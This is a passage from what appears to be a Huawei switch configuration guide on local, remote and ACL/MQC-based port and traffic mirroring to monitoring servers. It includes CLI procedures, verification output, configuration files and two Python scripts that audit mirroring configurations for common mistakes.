the Administrative department (hosts HostA through HostF); GE1/0/4 (local observing port)
connects the Server. Original packets arrive on the mirrored ports and mirrored packets leave
on the observing port.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/4 of the Switch as a local observing port to forward mirrored packets to
the Server.
2. Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy Internet
access traffic of the three departments to the local observing port.

Procedure
Step 1 Configure an observing port.
# Configure GE1/0/4 of the Switch as a local observing port.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface gigabitethernet 1/0/4 //Configure GE1/0/4 as local observing port 1.

Step 2 Configure mirrored ports.


# Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the packets
received by the mirrored ports to the local observing port.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //Mirror incoming traffic on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port-mirroring to observe-port 1 inbound //Mirror incoming traffic on GE1/0/2 to observing port 1.
[Switch-GigabitEthernet1/0/2] quit

[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port-mirroring to observe-port 1 inbound //Mirror incoming traffic on GE1/0/3 to observing port 1.
[Switch-GigabitEthernet1/0/3] return

Step 3 Verify the configuration.

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/4
----------------------------------------------------------------------

# Check the mirrored port configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/4
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
2 GigabitEthernet1/0/2 Inbound Observe-port 1
3 GigabitEthernet1/0/3 Inbound Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/4
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/2
port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/3
port-mirroring to observe-port 1 inbound
#
return
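The Configuration Notes repeated in 18.3.1 through 18.3.4 (keep observing ports dedicated, watch the bandwidth mismatch between mirrored and observing ports) can be checked against a saved configuration file before it is committed. The script below is an added example, not Huawei code: it parses the observe-port and port-mirroring lines as they appear in the Configuration Files sections, assumes every port is driven at its nominal interface speed and that each member of an observing port range receives a full copy of the mirrored traffic, and uses the N:1 configuration file above as its sample input.

```python
"""Check mirroring stanzas of a switch configuration file for the problems the
Configuration Notes warn about. Added example, not Huawei code: it parses the
observe-port and port-mirroring lines as they appear in the Configuration Files
of 18.3.1 to 18.3.4; it assumes each port is driven at its nominal speed."""
import re
from collections import defaultdict

# Nominal speeds by interface-name prefix (assumed, Mbit/s).
NOMINAL_MBPS = {"100GE": 100000, "40GE": 40000, "XGigabitEthernet": 10000, "GigabitEthernet": 1000}


def port_speed(name):
    return next((mbps for prefix, mbps in NOMINAL_MBPS.items() if name.startswith(prefix)), None)


def expand_range(first, last):
    """'GigabitEthernet1/0/2' .. 'GigabitEthernet1/0/4' -> the three member names."""
    m1, m2 = re.match(r"(.*?)(\d+)$", first), re.match(r"(.*?)(\d+)$", last)
    if not (m1 and m2) or m1.group(1) != m2.group(1):
        raise ValueError(f"unsupported interface range {first} to {last}")
    return [f"{m1.group(1)}{i}" for i in range(int(m1.group(2)), int(m2.group(2)) + 1)]


def parse_config(text):
    observe = {}                      # observe-port index -> member ports
    rules = []                        # (mirrored port, observe-port index, direction)
    other_config = defaultdict(list)  # port -> non-mirroring lines under it
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("", "#", "return"):
            continue
        if m := re.match(r"observe-port (\d+) interface-range (\S+) to (\S+)$", line):
            observe[int(m.group(1))] = expand_range(m.group(2), m.group(3))
            current = None
        elif m := re.match(r"observe-port (\d+) interface (\S+)$", line):
            observe[int(m.group(1))] = [m.group(2)]
            current = None
        elif m := re.match(r"interface (\S+)$", line):
            current = m.group(1)
        elif current and (m := re.match(r"port-mirroring to observe-port (\d+) (inbound|outbound|both)$", line)):
            rules.append((current, int(m.group(1)), m.group(2)))
        elif current:
            other_config[current].append(line)
    return observe, rules, other_config


def check(text):
    """Return a list of human-readable findings; an empty list means nothing to flag."""
    observe, rules, other_config = parse_config(text)
    findings, offered = [], defaultdict(int)  # offered: index -> Mbit/s sent to each member
    mirrored = {port for port, _, _ in rules}
    for port, idx, direction in rules:
        if idx not in observe:
            findings.append(f"{port}: observe-port {idx} is referenced but not defined")
            continue
        speed = port_speed(port)
        if speed is None:
            findings.append(f"{port}: unknown interface type, load not estimated")
            continue
        offered[idx] += speed * (2 if direction == "both" else 1)
    for idx, members in observe.items():
        for member in members:  # each member of a range gets a full copy
            if member in mirrored:
                findings.append(f"{member}: observing port {idx} is also a mirrored port")
            if other_config.get(member):
                findings.append(f"{member}: observing port {idx} carries other service config: "
                                + "; ".join(other_config[member]))
            speed = port_speed(member)
            if speed and offered[idx] > speed:
                findings.append(f"{member}: observing port {idx} oversubscribed, {offered[idx]} Mbit/s "
                                f"offered vs {speed} Mbit/s capacity ({offered[idx] / speed:.1f}:1)")
    return findings


# Configuration file of the Switch from 18.3.4 (N:1 mirroring), used as sample input.
N_TO_1_CONFIG = """\
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/4
#
interface GigabitEthernet1/0/1
 port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/2
 port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/3
 port-mirroring to observe-port 1 inbound
#
return
"""

if __name__ == "__main__":
    print("\n".join(check(N_TO_1_CONFIG) or ["no findings"]))
```

For the N:1 example the only finding is the 3:1 oversubscription of GE1/0/4, which is exactly the packet-loss case the second Configuration Note describes.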

Related Content
Support Community
Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
How to Configure Port Mirroring

18.3.5 Example for Configuring Local Port Mirroring (M:N Mirroring)

M:N Mirroring Overview


In M:N mirroring, packets on M mirrored ports are copied to N observing ports so that
packets on multiple ports can be copied to different monitoring devices for analysis and
processing.
An M:N mirroring rule is equivalent to multiple 1:N mirroring rules and also requires
multiple observing ports to be configured and connected to different monitoring devices.
Observing ports can be configured one by one or in a batch. The single and batch
configuration modes can be used simultaneously. Observing ports configured in a batch can
be bound to the same mirrored port to simplify the configuration of M:N mirroring.
Therefore, batch configuration is recommended in M:N mirroring.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l In M:N mirroring, each direction (inbound or outbound) of a mirrored port can be bound
to only one observing-port index. Once, for example, the inbound packets of a mirrored
port are bound to a batch-configured group of observing ports, they cannot also be copied
to observing ports outside that group.
l In this configuration example, observing ports are configured in a batch, so applicable
products and versions of this example are the same as 18.3.3 Example for Configuring
Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured in
a Batch). If observing ports are configured one by one, applicable products and versions
of the configuration example are the same as 18.3.2 Example for Configuring Local
Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured One by
One).

Networking Requirements
As shown in Figure 18-12, three departments (R&D department 1, R&D department 2, and
Marketing department) of a company access the Internet through the Switch, and monitoring
devices Server1 and Server2 are directly connected to the Switch.
Internet access traffic of the three departments needs to be mirrored to different servers for
different monitoring and analysis purposes.


Figure 18-12 Local port mirroring networking
[Figure: the Switch connects upstream to the Internet. Mirrored ports GE1/0/1, GE1/0/2 and
GE1/0/3 connect R&D department 1, R&D department 2 and the Marketing department (hosts
HostA through HostF). Local observing port GE1/0/4 connects to Server1 and GE1/0/5 to
Server2. Legend: mirrored port, local observing port, original packets, mirrored packets.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/4 and GE1/0/5 of the Switch as local observing ports to forward
mirrored packets to different servers.
2. Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the traffic
passing through the mirrored ports to different local observing ports.

Procedure
Step 1 Configure observing ports.
# Configure GE1/0/4 and GE1/0/5 of the Switch as local observing ports in a batch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface-range gigabitethernet 1/0/4 gigabitethernet
1/0/5 //Configure GE1/0/4 and GE1/0/5 as local observing ports in a batch and
share observing port 1.

Step 2 Configure mirrored ports.


# Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the packets
received by the mirrored ports to different local observing ports.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //
Mirror incoming traffic on GE1/0/1 to observing port 1.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port-mirroring to observe-port 1 inbound //
Mirror incoming traffic on GE1/0/2 to observing port 1.
[Switch-GigabitEthernet1/0/2] quit


[Switch] interface gigabitethernet 1/0/3


[Switch-GigabitEthernet1/0/3] port-mirroring to observe-port 1 inbound //
Mirror incoming traffic on GE1/0/3 to observing port 1.
[Switch-GigabitEthernet1/0/3] return

Step 3 Verify the configuration.

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface-range: GigabitEthernet1/0/4 to GigabitEthernet1/0/5
----------------------------------------------------------------------

# Check the mirrored port configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/4 to GigabitEthernet1/0/5
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
2 GigabitEthernet1/0/2 Inbound Observe-port 1
3 GigabitEthernet1/0/3 Inbound Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface-range GigabitEthernet1/0/4 to GigabitEthernet1/0/5
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/2
port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/3
port-mirroring to observe-port 1 inbound
#
return

Related Content
Support Community
l Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
l Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
l How to Configure Port Mirroring


18.3.6 Example for Configuring Layer 2 Remote Port Mirroring

Layer 2 Remote Port Mirroring Overview


In Layer 2 remote port mirroring, an observing port is connected to a monitoring device
through a Layer 2 network. After the observing port receives mirrored packets from a
mirrored port, the observing port adds a VLAN tag corresponding to the Layer 2 network to
the packets and forwards the packets to the Layer 2 network. An intermediate Layer 2 device
then sends the packets to the monitoring device.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.
l The vlan vlan-id parameter is specified when a Layer 2 remote observing port is
configured; it makes the observing port send mirrored packets to the monitoring device
tagged with that VLAN. The observing port itself does not need to be added to the VLAN.
Because mirrored frames are flooded within that VLAN on the intermediate switches, anything
attached to the VLAN can receive full copies of the monitored traffic: keep the VLAN
dedicated to mirroring and allow it only on the trunks that lead to the monitoring device.

Networking Requirements
As shown in Figure 18-13, the administrative department of a company accesses the Internet
through SwitchA, and the monitoring device Server is connected to SwitchA through
SwitchB.
Internet access traffic of the administrative department needs to be monitored through the
Server.


Figure 18-13 Layer 2 remote port mirroring networking
[Figure: SwitchA connects upstream to the Internet. GE1/0/1 of SwitchA (mirrored port)
connects the administrative department (HostA, HostB, HostC). GE1/0/2 of SwitchA (remote
observing port) connects over VLAN 10 to GE1/0/2 of SwitchB, and GE1/0/1 of SwitchB
connects to the Server. Legend: common port, mirrored port, remote observing port, original
packets, mirrored packets.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port to forward mirrored
packets to the specified VLAN.
2. Configure GE1/0/1 of SwitchA as a mirrored port to copy Internet access traffic of the
administrative department to the Layer 2 remote observing port.
3. Create a VLAN on SwitchB, and add ports to the VLAN to forward the mirrored packets
sent from the observing port to the Server.

Procedure
Step 1 Configure an observing port on SwitchA.
# Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port and bind the observing
port to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] observe-port 1 interface gigabitethernet 1/0/2 vlan 10 //Configure
GE1/0/2 as Layer 2 remote observing port 1 and bind it to VLAN 10.

After this configuration, the observing port sends mirrored packets tagged with VLAN 10;
the observing port itself does not need to be added to VLAN 10.
Step 2 Configure a mirrored port on SwitchA.
# Configure GE1/0/1 of SwitchA as a mirrored port to copy the packets received by the
mirrored port to the Layer 2 remote observing port.


[SwitchA] interface gigabitethernet 1/0/1


[SwitchA-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //
Mirror incoming traffic on GE1/0/1 to observing port 1.
[SwitchA-GigabitEthernet1/0/1] return

Step 3 Create a VLAN on SwitchB and add ports to the VLAN.


# Create VLAN 10 on SwitchB and add GE1/0/1 and GE1/0/2 to VLAN 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 10
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type access //Set the link type of
the interface connected to the monitoring device to access. The default link type
of an interface is not access, so it must be set explicitly.
[SwitchB-GigabitEthernet1/0/1] port default vlan 10
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2
[SwitchB-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the network-side interface to trunk. The default link type of an interface is
not trunk, so it must be set explicitly.
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 10 //Allow only the
mirroring VLAN on this trunk.
[SwitchB-GigabitEthernet1/0/2] return

Step 4 Verify the configuration.


# Check the observing port configuration.
<SwitchA> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
Vlan : 10
----------------------------------------------------------------------

# Check the mirrored port configuration.


<SwitchA> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
Mirror-port Direction Observe-port
----------------------------------------------------------------------
1 GigabitEthernet1/0/1 Inbound Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
#
interface GigabitEthernet1/0/1
port-mirroring to observe-port 1 inbound
#
return

l Configuration file of SwitchB


#
sysname SwitchB


#
vlan batch 10
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
return
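Before trusting a mirroring deployment, check the configuration file itself rather than only the display output: a mistyped observe-port index, or a service VLAN that someone later adds to an observing port, silently breaks or pollutes the monitoring feed. The following Python script is an added example, not Huawei's code. It audits the configuration-file syntax shown in this section and in 18.3.5: every port-mirroring, traffic-mirror or behavior mirroring statement must refer to a defined observe-port index, observing ports must carry no other configuration, no port may be both mirrored and observing, and Layer 2 remote observing ports are flagged because their copies leave the switch in the bound VLAN. The sample configuration is constructed for the example and contains two deliberate defects; the interface-range expansion handles only ranges on one card.

```python
"""Static audit of mirroring statements in a Huawei VRP configuration file.

Added example, not Huawei code. Input is the 'Configuration Files' text shown
on this page; output is a list of (severity, message) findings.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: SwitchA from the Layer 2 remote mirroring example plus an
# M:N observing-port range, with two deliberate defects: GE1/0/3 mirrors to an
# undefined observe-port index, and observing port GE1/0/4 carries service config.
SAMPLE_CONFIG = """\
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
observe-port 2 interface-range GigabitEthernet1/0/4 to GigabitEthernet1/0/5
#
interface GigabitEthernet1/0/1
 port-mirroring to observe-port 1 inbound
#
interface GigabitEthernet1/0/3
 traffic-mirror inbound acl 3000 to observe-port 9
#
interface GigabitEthernet1/0/4
 port link-type access
 port default vlan 20
#
return
"""

OBSERVE_RE = re.compile(r"^observe-port (\d+) interface(?:-range)? (.+?)(?: vlan (\d+))?$")
MIRROR_RE = re.compile(r"^(?:port-mirroring|traffic-mirror .*?|mirroring) to observe-port (\d+)")
CONTEXT_RE = re.compile(r"^(interface|traffic behavior) (\S+)$")


@dataclass
class MirrorAudit:
    observe_ports: dict = field(default_factory=dict)  # index -> {"interfaces": [...], "vlan": int|None}
    mirrored: dict = field(default_factory=dict)       # interface or behavior name -> [observe-port indexes]
    findings: list = field(default_factory=list)       # (severity, message)


def expand_range(spec):
    """'GigabitEthernet1/0/4 to GigabitEthernet1/0/5' -> both member names (same card only).
    Anything else (one interface, or several space-separated) is returned as given."""
    m = re.fullmatch(r"(\S+?)(\d+) to (\S+?)(\d+)", spec)
    if m and m.group(1) == m.group(3):
        prefix, lo, hi = m.group(1), int(m.group(2)), int(m.group(4))
        return [f"{prefix}{n}" for n in range(lo, hi + 1)]
    return spec.split()


def audit_mirroring(config_text):
    audit = MirrorAudit()
    context = None   # name of the current "interface X" / "traffic behavior X" block
    body = {}        # context name -> its non-mirroring config lines
    for raw in config_text.splitlines():
        line = raw.strip()
        if line == "#":              # '#' closes a config block
            context = None
            continue
        if not line or line == "return":
            continue
        ctx = CONTEXT_RE.match(line)
        if ctx:
            context = ctx.group(2)
            body.setdefault(context, [])
            continue
        obs = OBSERVE_RE.match(line)
        if obs and context is None:  # observe-port is a system-view command
            audit.observe_ports[int(obs.group(1))] = {
                "interfaces": expand_range(obs.group(2)),
                "vlan": int(obs.group(3)) if obs.group(3) else None,
            }
            continue
        if context is None:
            continue
        mir = MIRROR_RE.match(line)
        if mir:
            audit.mirrored.setdefault(context, []).append(int(mir.group(1)))
        else:
            body[context].append(line)

    observing = {}  # interface -> observe-port index
    for idx, info in sorted(audit.observe_ports.items()):
        for name in info["interfaces"]:
            observing[name] = idx
            if body.get(name):  # Configuration Notes: observing ports are dedicated to mirrored traffic
                audit.findings.append(("WARN", f"{name} is observing port {idx} but also carries "
                                               f"service config: {body[name]}"))
        if info["vlan"] is not None:
            audit.findings.append(("INFO", f"observe-port {idx} is a Layer 2 remote observing port; "
                                           f"mirrored copies leave the switch in VLAN {info['vlan']}, "
                                           f"so that VLAN must be confined to the monitoring path"))
    for name, indexes in audit.mirrored.items():
        for idx in indexes:
            if idx not in audit.observe_ports:
                audit.findings.append(("ERROR", f"{name} mirrors to observe-port {idx}, which is not defined"))
        if name in observing:
            audit.findings.append(("ERROR", f"{name} is both a mirrored port and observing port {observing[name]}"))
    return audit


if __name__ == "__main__":
    for severity, message in audit_mirroring(SAMPLE_CONFIG).findings:
        print(f"[{severity}] {message}")
```

Run it against the output of display current-configuration saved from each switch; a clean file such as the M:N example in 18.3.5 produces no findings, while the constructed sample reports one INFO, one WARN and one ERROR.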

Related Content
Support Community
l Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
l Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
l How to Configure Port Mirroring

18.3.7 Example for Configuring MQC-based Local Traffic Mirroring

Local Traffic Mirroring Overview


In local traffic mirroring, service traffic matching configured rules is copied to an observing
port that is directly connected to a monitoring device for analysis and monitoring.

You can configure traffic mirroring using Modular QoS Command-Line Interface (MQC) or
ACL. MQC-based traffic mirroring takes more configuration but supports more matching rules
and can be applied in both the inbound and outbound directions. ACL-based traffic mirroring
is simpler to configure but supports fewer matching rules and can be applied only in the
inbound direction.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.


Networking Requirements
As shown in Figure 18-14, the science and technology department and administrative
department of a company use 10.1.1.0/24 and 10.1.2.0/24 respectively to access the Internet
or communicate with each other through the Switch. The monitoring device Server is directly
connected to the Switch.
The following traffic of the science and technology department needs to be monitored through
the Server:
l Internet access traffic
l Traffic sent to the administrative department

Figure 18-14 Local traffic mirroring networking
[Figure: the Switch connects upstream to the Internet. GE1/0/1 (mirrored port) connects the
science and technology department (10.1.1.0/24); the administrative department (10.1.2.0/24)
also connects to the Switch (hosts HostA through HostD). GE1/0/2 (local observing port)
connects to the Server. Service flow 1: traffic from the science and technology department
to the Internet. Service flow 2: traffic from the science and technology department to the
administrative department. Legend: mirrored port, local observing port, original packets,
mirrored packets.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of the Switch as a local observing port to forward mirrored packets to
the Server.
2. Configure a traffic classifier on the Switch to match Internet access traffic and traffic
sent to the administrative department, and configure a traffic behavior to mirror traffic to
a local observing port.
3. Configure a traffic policy on the Switch, bind the traffic classifier and traffic behavior to
the traffic policy, and apply the traffic policy to GE1/0/1.


Procedure
Step 1 Configure an observing port.
# Configure GE1/0/2 of the Switch as a local observing port.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface gigabitethernet 1/0/2 //Configure GE1/0/2
as a local observing port 1.

Step 2 Configure a traffic classifier.


# Create a traffic classifier c1 on the Switch, and configure rules to match two types of traffic:
traffic with source network segment 10.1.1.0/24 and destination TCP port number WWW and
traffic with source network segment 10.1.1.0/24 and destination network segment 10.1.2.0/24.
[Switch] acl number 3000 //Create ACL 3000 whose permit rule matches packets
from 10.1.1.0/24 to TCP destination port WWW (80). In a mirroring policy the ACL
only selects packets to copy; it does not filter forwarding.
[Switch-acl-adv-3000] rule permit tcp source 10.1.1.0 0.0.0.255 destination-port
eq www
[Switch-acl-adv-3000] quit
[Switch] acl number 3001 //Create ACL 3001 whose permit rule matches packets
from 10.1.1.0/24 to 10.1.2.0/24.
[Switch-acl-adv-3001] rule permit ip source 10.1.1.0 0.0.0.255 destination
10.1.2.0 0.0.0.255
[Switch-acl-adv-3001] quit
[Switch] traffic classifier c1 operator or //Create a traffic classifier c1,
and match ACL 3000 or ACL 3001.
[Switch-classifier-c1] if-match acl 3000
[Switch-classifier-c1] if-match acl 3001
[Switch-classifier-c1] quit

Step 3 Configure a traffic behavior.


# Create a traffic behavior b1 on the Switch, and define traffic mirroring in the traffic
behavior to copy specified traffic to local observing port GE1/0/2.
[Switch] traffic behavior b1 //Create a traffic behavior b1 to mirror
specified traffic to observing port 1.
[Switch-behavior-b1] mirroring to observe-port 1
[Switch-behavior-b1] quit

Step 4 Configure a traffic policy and apply the traffic policy to an interface.
# Create a traffic policy named p1 on the Switch, bind the traffic behavior and traffic
classifier to the traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1
to monitor specified traffic of the science and technology department.
[Switch] traffic policy p1 //Create a traffic policy p1 and bind the traffic
behavior and traffic classifier to the traffic policy.
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound //Apply the traffic
policy p1 to the inbound direction of GE1/0/1.
[Switch-GigabitEthernet1/0/1] return

Step 5 Verify the configuration.


# Check the traffic classifier configuration.
<Switch> display traffic classifier user-defined c1
User Defined Classifier Information:
Classifier: c1
Precedence: 5


Operator: OR
Rule(s) : if-match acl 3000
if-match acl 3001

# Check the traffic policy configuration.


<Switch> display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit
Mirroring to observe-port 1

# Check the observing port configuration.


<Switch> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface : GigabitEthernet1/0/2
----------------------------------------------------------------------

# Check the mirroring configuration.


<Switch> display port-mirroring
----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
Behavior Direction Observe-port
----------------------------------------------------------------------
1 b1 - Observe-port 1
----------------------------------------------------------------------

----End

Configuration Files
l Configuration file of the Switch
#
sysname Switch
#
observe-port 1 interface GigabitEthernet1/0/2
#
acl number 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www
acl number 3001
rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255
#
traffic classifier c1 operator or precedence 5
if-match acl 3000
if-match acl 3001
#
traffic behavior b1
permit
mirroring to observe-port 1
#
traffic policy p1 match-order config
classifier c1 behavior b1
#
interface GigabitEthernet1/0/1
traffic-policy p1 inbound
#
return


Related Content
Support Community
l Mirroring – an Effective Network Monitoring Tool (Working Mechanism and Configuration)
l Mirroring – an Effective Network Monitoring Tool (Specifications)
Videos
l How to Configure Port Mirroring

18.3.8 Example for Configuring ACL-based Local Traffic Mirroring

Local Traffic Mirroring Overview


In local traffic mirroring, service traffic matching configured rules is copied to an observing
port that is directly connected to a monitoring device for analysis and monitoring.

You can configure traffic mirroring using Modular QoS Command-Line Interface (MQC) or
ACL. MQC-based traffic mirroring takes more configuration but supports more matching rules
and can be applied in both the inbound and outbound directions. ACL-based traffic mirroring
is simpler to configure but supports fewer matching rules and can be applied only in the
inbound direction.

Configuration Notes
l An observing port is dedicated to forwarding mirrored traffic. Do not configure other
services on an observing port; otherwise, mirrored traffic and other service traffic
interfere with each other.
l If the mirroring function is deployed on many ports of a device, a great deal of internal
forwarding bandwidth will be occupied, which may affect the forwarding of other
services. Additionally, if the mirrored port and observing port provide different
bandwidth, for example, 1000 Mbit/s on the mirrored port and 100 Mbit/s on the
observing port, the observing port may fail to forward all mirrored packets in a timely
manner because of insufficient bandwidth, leading to packet loss.
l On all Huawei S series modular switch models, Eth-Trunks can be configured as
observing ports.
l Both Ethernet ports and Eth-Trunks can be configured as mirrored ports. If an Eth-Trunk
is configured as a mirrored port, its member ports cannot be configured as observing
ports.

Networking Requirements
As shown in Figure 18-15, the science and technology department and administrative
department of a company use 10.1.1.0/24 and 10.1.2.0/24 respectively to access the Internet
or communicate with each other through the Switch. The monitoring device Server is directly
connected to the Switch.

The following traffic of the science and technology department needs to be monitored through
the Server:
l Internet access traffic
l Traffic sent to the administrative department

Figure 18-15 Local traffic mirroring networking
[Figure: the Switch connects upstream to the Internet. GE1/0/1 (mirrored port) connects the
science and technology department (10.1.1.0/24); the administrative department (10.1.2.0/24)
also connects to the Switch (hosts HostA through HostD). GE1/0/2 (local observing port)
connects to the Server. Service flow 1: traffic from the science and technology department
to the Internet. Service flow 2: traffic from the science and technology department to the
administrative department. Legend: mirrored port, local observing port, original packets,
mirrored packets.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure GE1/0/2 of the Switch as a local observing port to forward mirrored packets to
the Server.
2. Configure advanced ACLs to match two types of traffic of the science and technology
department: Internet access traffic and traffic sent to the administrative department.
3. Configure an ACL-based traffic policy on GE1/0/1 to mirror the matching traffic.

Procedure
Step 1 Configure an observing port.

# Configure GE1/0/2 of the Switch as a local observing port.


<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] observe-port 1 interface gigabitethernet 1/0/2 //Configure GE1/0/2
as local observing port 1.


Step 2 Configure advanced ACLs.


# Create two advanced ACLs numbered 3000 and 3001 on the Switch, configure ACL 3000
to match traffic with source network segment 10.1.1.0/24 and destination TCP port number
WWW, and configure ACL 3001 to match traffic with source network segment 10.1.1.0/24
and destination network segment 10.1.2.0/24.
[Switch] acl number 3000 //Create ACL 3000 whose permit rule matches packets
from 10.1.1.0/24 to TCP destination port WWW (80). Under traffic-mirror the ACL
only selects packets to copy; it does not filter forwarding.
[Switch-acl-adv-3000] rule permit tcp source 10.1.1.0 0.0.0.255 destination-port
eq www
[Switch-acl-adv-3000] quit
[Switch] acl number 3001 //Create ACL 3001 whose permit rule matches packets
from 10.1.1.0/24 to 10.1.2.0/24.
